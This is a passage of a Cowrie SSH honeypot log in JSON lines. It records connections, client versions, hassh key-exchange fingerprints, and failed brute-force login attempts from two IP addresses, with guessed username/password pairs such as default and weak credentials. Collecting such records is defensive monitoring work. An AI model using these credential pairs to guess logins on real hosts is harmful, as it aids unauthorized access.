ie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:02.457365Z","src_ip":"212.227.235.229","session":"8cb5d3cc3d59"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"4.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:02.471265Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.session.closed","duration":"21.8","message":"Connection lost after 21.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:02.473819Z","src_ip":"212.227.235.229","session":"a68a46d777ed"}
{"eventid":"cowrie.login.failed","username":"cf1c22","password":"cf1c22","message":"login attempt [cf1c22/cf1c22] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:03.489752Z","src_ip":"212.227.235.229","session":"8cb5d3cc3d59"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:03.768728Z","src_ip":"212.227.125.160","session":"5a343e681da5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:51:03.794652Z","src_ip":"212.227.125.160","session":"5a343e681da5"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:05.959318Z","src_ip":"212.227.235.229","session":"8cb5d3cc3d59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35742,"dst_ip":"1.2.3.4","dst_port":22,"session":"10f677a5c4fd","protocol":"ssh","message":"New connection: 212.227.235.229:35742 (1.2.3.4:22) [session: 10f677a5c4fd]","sensor":"my-vps","timestamp":"2025-08-31T04:51:07.493164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:07.495296Z","src_ip":"212.227.235.229","session":"10f677a5c4fd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:07.942916Z","src_ip":"212.227.235.229","session":"10f677a5c4fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58746,"dst_ip":"1.2.3.4","dst_port":22,"session":"af41ccfacbd3","protocol":"ssh","message":"New connection: 212.227.235.229:58746 (1.2.3.4:22) [session: af41ccfacbd3]","sensor":"my-vps","timestamp":"2025-08-31T04:51:08.464243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:08.560039Z","src_ip":"212.227.235.229","session":"af41ccfacbd3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:08.770373Z","src_ip":"212.227.235.229","session":"af41ccfacbd3"}
{"eventid":"cowrie.login.failed","username":"strycek","password":"st13ip","message":"login attempt [strycek/st13ip] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:09.200913Z","src_ip":"212.227.235.229","session":"10f677a5c4fd"}
{"eventid":"cowrie.login.failed","username":"office","password":"office","message":"login attempt [office/office] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:10.017654Z","src_ip":"212.227.235.229","session":"af41ccfacbd3"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:10.460998Z","src_ip":"212.227.235.229","session":"10f677a5c4fd"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:11.397272Z","src_ip":"212.227.235.229","session":"af41ccfacbd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44052,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a1632b4de7d","protocol":"ssh","message":"New connection: 212.227.235.229:44052 (1.2.3.4:22) [session: 6a1632b4de7d]","sensor":"my-vps","timestamp":"2025-08-31T04:51:13.312036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:13.392784Z","src_ip":"212.227.235.229","session":"6a1632b4de7d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:13.640653Z","src_ip":"212.227.235.229","session":"6a1632b4de7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42634,"dst_ip":"1.2.3.4","dst_port":22,"session":"b54850c2d63e","protocol":"ssh","message":"New connection: 212.227.125.160:42634 (1.2.3.4:22) [session: b54850c2d63e]","sensor":"my-vps","timestamp":"2025-08-31T04:51:13.967791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:51:14.380719Z","src_ip":"212.227.125.160","session":"b54850c2d63e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:51:14.381462Z","src_ip":"212.227.125.160","session":"b54850c2d63e"}
{"eventid":"cowrie.login.failed","username":"vyos","password":"vyos","message":"login attempt [vyos/vyos] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:14.739194Z","src_ip":"212.227.235.229","session":"6a1632b4de7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58762,"dst_ip":"1.2.3.4","dst_port":22,"session":"03832d567565","protocol":"ssh","message":"New connection: 212.227.235.229:58762 (1.2.3.4:22) [session: 03832d567565]","sensor":"my-vps","timestamp":"2025-08-31T04:51:14.900419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:14.913508Z","src_ip":"212.227.235.229","session":"03832d567565"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:51:15.167767Z","src_ip":"212.227.235.229","session":"03832d567565"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:16.415791Z","src_ip":"212.227.235.229","session":"6a1632b4de7d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"abc123","message":"login attempt [postgres/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:16.688020Z","src_ip":"212.227.125.160","session":"b54850c2d63e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53594,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fc2fa45bada","protocol":"ssh","message":"New connection: 212.227.235.229:53594 (1.2.3.4:22) [session: 2fc2fa45bada]","sensor":"my-vps","timestamp":"2025-08-31T04:51:17.269079Z"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:18.395681Z","src_ip":"212.227.125.160","session":"b54850c2d63e"}
{"eventid":"cowrie.login.failed","username":"joggler","password":"joggler","message":"login attempt [joggler/joggler] failed","sensor":"my-vps","timestamp":"2025-08-31T04:51:19.529940Z","src_ip":"212.227.235.229","session":"03832d567565"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:51:21.349696Z","src_ip":"212.227.235.229","session":"03832d567565"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54196,"dst_ip":"1.2.3.4","dst_port":22,"session":"07bc4eb5b5e2","protocol":"ssh","message":"New connection: 212.227.235.229:54196 (1.2.3.4:22) [session: 07bc4eb5b5e2]","sensor":"my-vps","timestamp":"2025-08-31T04:51:32.733429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:51:32.829562Z","src_ip":"212.227.235.229","session":"07bc4eb5b5e2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96